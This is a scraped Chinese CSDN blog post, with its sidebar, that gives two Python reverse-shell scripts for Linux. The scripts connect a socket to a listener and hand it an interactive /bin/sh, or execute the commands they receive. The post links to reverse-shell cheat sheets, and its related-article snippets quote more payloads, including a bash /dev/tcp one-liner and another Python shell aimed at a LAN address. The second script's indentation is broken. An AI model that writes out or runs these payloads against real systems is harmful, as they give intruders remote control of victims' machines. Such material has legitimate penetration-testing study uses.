python反弹shell(linux)

最新推荐文章于 2024-05-15 21:26:16 发布
最新推荐文章于 2024-05-15 21:26:16 发布
阅读量3k 收藏
点赞数
分类专栏: linux操作系统 python学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35569814/article/details/101948118
版权

第一种代码如下

  • 标准输入   (stdin) :代码为 0 ,使用 < 或 << 
  • 标准输出   (stdout):代码为 1 ,使用 > 或 >> 
  • 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>
import socket,subprocess,os 

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect(("127.0.0.1",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1) #将这个文件描述符代表的文件,传递给1描述符指向的文件(也就是stdout)
os.dup2(s.fileno(),2) 
p=subprocess.call(["/bin/sh","-i"])

第二种

import socket, subprocess
s = socket.socket()
s.connect(('127.0.0.1',6666))
while 1:
    proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(proc.stdout.read()+proc.stderr.read())

其他反弹shell

linux:https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html

linux:https://www.jianshu.com/p/6aca9b29514d

windows:https://www.cnblogs.com/ring3/p/6193662.html

秋水sir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
linux-ReverseShellasaService反弹shell即服务
08-13
Linux环境中,"Reverse Shell as a Service"(反弹shell即服务)是一种安全研究中的技术,主要用于渗透测试和漏洞利用场景。反弹shell允许攻击者在远程系统上获得命令执行的通道,从而控制目标系统。这种技术通常...
【安全知识】——LInuxshell反弹姿势合集(更新中)
qq_53058639的博客
01-24 1070
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
python反弹shell_几种Linux反弹shell的方法总结
weixin_39719749的博客
01-29 405
在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。一、nc和bash在我们的主机上执行 nc -lvp port表示显示执行过程监听端口在目标主机上执行 bash -i >& /dev/tcp/ip/port 0>$1这样就可以在我们的主机上执行命令了二、nc和python在我们的主机上执行 n...
Python 渗透测试:反弹 shell反弹 后门 || 程序免杀)
最新发布
网络安全领域___专研者.
05-15 1891
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
实现交互式shell的几种方式:python pty 方式、升级nc、socat、script获取pty
热门推荐
闵行小鱼塘
06-04 1万+
当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。 那我们怎么获取一个可交互的webshell呢?
使用python反弹shell
weixin_43803070的博客
07-10 2023
先上脚本: #!/usr/bin/python #coding=utf-8 import os,subprocess,socket s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.107",19)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) ...
使用python和bash反弹shell的方法详解
weixin_45588247的博客
07-20 3101
实验名称:实验(反向反弹) 实验环境: 攻击(攻击者)主机: Kali2020.2 虚拟机 nat 192.168.254.132 目标(受害者)主机: Centos_6.0...
linux内网渗透1
08-03
攻击者使用Metasploit(MSF)生成Python反弹shell,通过LHOST和LPORT参数设置回连地址和端口。一旦shell反弹回来,攻击者可以执行各种操作。然后,使用扫描工具探测内网开放的服务,如FTP、SMB、SNMP和端口。 6. *...
python 实现socket通信实例之client.py
09-04
python 实现socket通信实例之client.py socket又称套间字或者插口,是网络通信中必不可少的工具。有道是:“无socket,不网络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是...
python 实现socket通信实例之server.py
09-04
python 实现socket通信实例之server.py socket又称套间字或者插口,是网络通信中必不可少的工具。有道是:“无socket,不网络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是...
(网络安全方向)python实现NIDS的相关功能
07-31
2、针对命令行输出异常检测,如:CC攻击,SYN_Flood,CPU进程负载异常,反弹shell 3、针对敏感目录下的文件增删改操作检测和重要文件安全配置项检测 4、数据库存储预警信息 5、基于python的flask框架实现web界面...
Linux入侵常用命令之防黑客示例代码
09-15
黑客可能上传C语言源代码文件并编译成可执行程序,以反弹shell到自己的服务器。例如,使用`gcc -o 2 2.c`,`chmod +x 2`,然后执行`./2`。 6. **下载与编译库**: 对于某些工具(如arpsniffer),可能需要先下载...
Linux提权思路+实战 _ Mugen1
08-03
例如,通过反弹shell技术,当仅有一个低权限webshell时,攻击者可以使用netcat工具开启本地监听,然后在目标主机上执行反弹shell命令,将shell连接回本地。`bash -i >& /dev/tcp/192.168.1.1/8080 0>&1` 是一个典型...
Linux 提权 exp 大全
03-15
linux提权exp 集成现在几乎所有的exp 还有反弹shell脚本 pl版的反弹和.C文件的反弹
AWD比赛各类必备脚本
07-09
6. **反弹Shell**:通过控制受害主机向攻击者的服务器建立连接,实现远程控制。这需要理解TCP/IP协议栈,熟悉如何构造反向连接payload。 7. **后台flag读取**:在AWD比赛中,"flag"通常代表关键信息,需要在不被...
windows 反弹shell_反弹shell的各种姿势
weixin_39800331的博客
11-27 424
来自公众号:Bypass在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。)Linu...
python与命令行(shell,cmd)或者其他命令行程序持续交互的方法
THMAIL的博客
05-21 5904
法一: from subprocess import Popen, TimeoutExpired, PIPE # 这里必须使用信号 PIPE 而不是自己创建的文本流,这样才能使用 communicate 函数 proc = Popen(args='python ./test.py', shell=True, encoding='utf-8', stdin=PIPE, stdout=PIPE, stderr=PIPE) try: outs, errs = proc.communicate(inp
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5386
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
python反弹shell
08-30
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 1. 首先,在本地计算机上运行一个监听程序,等待连接...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值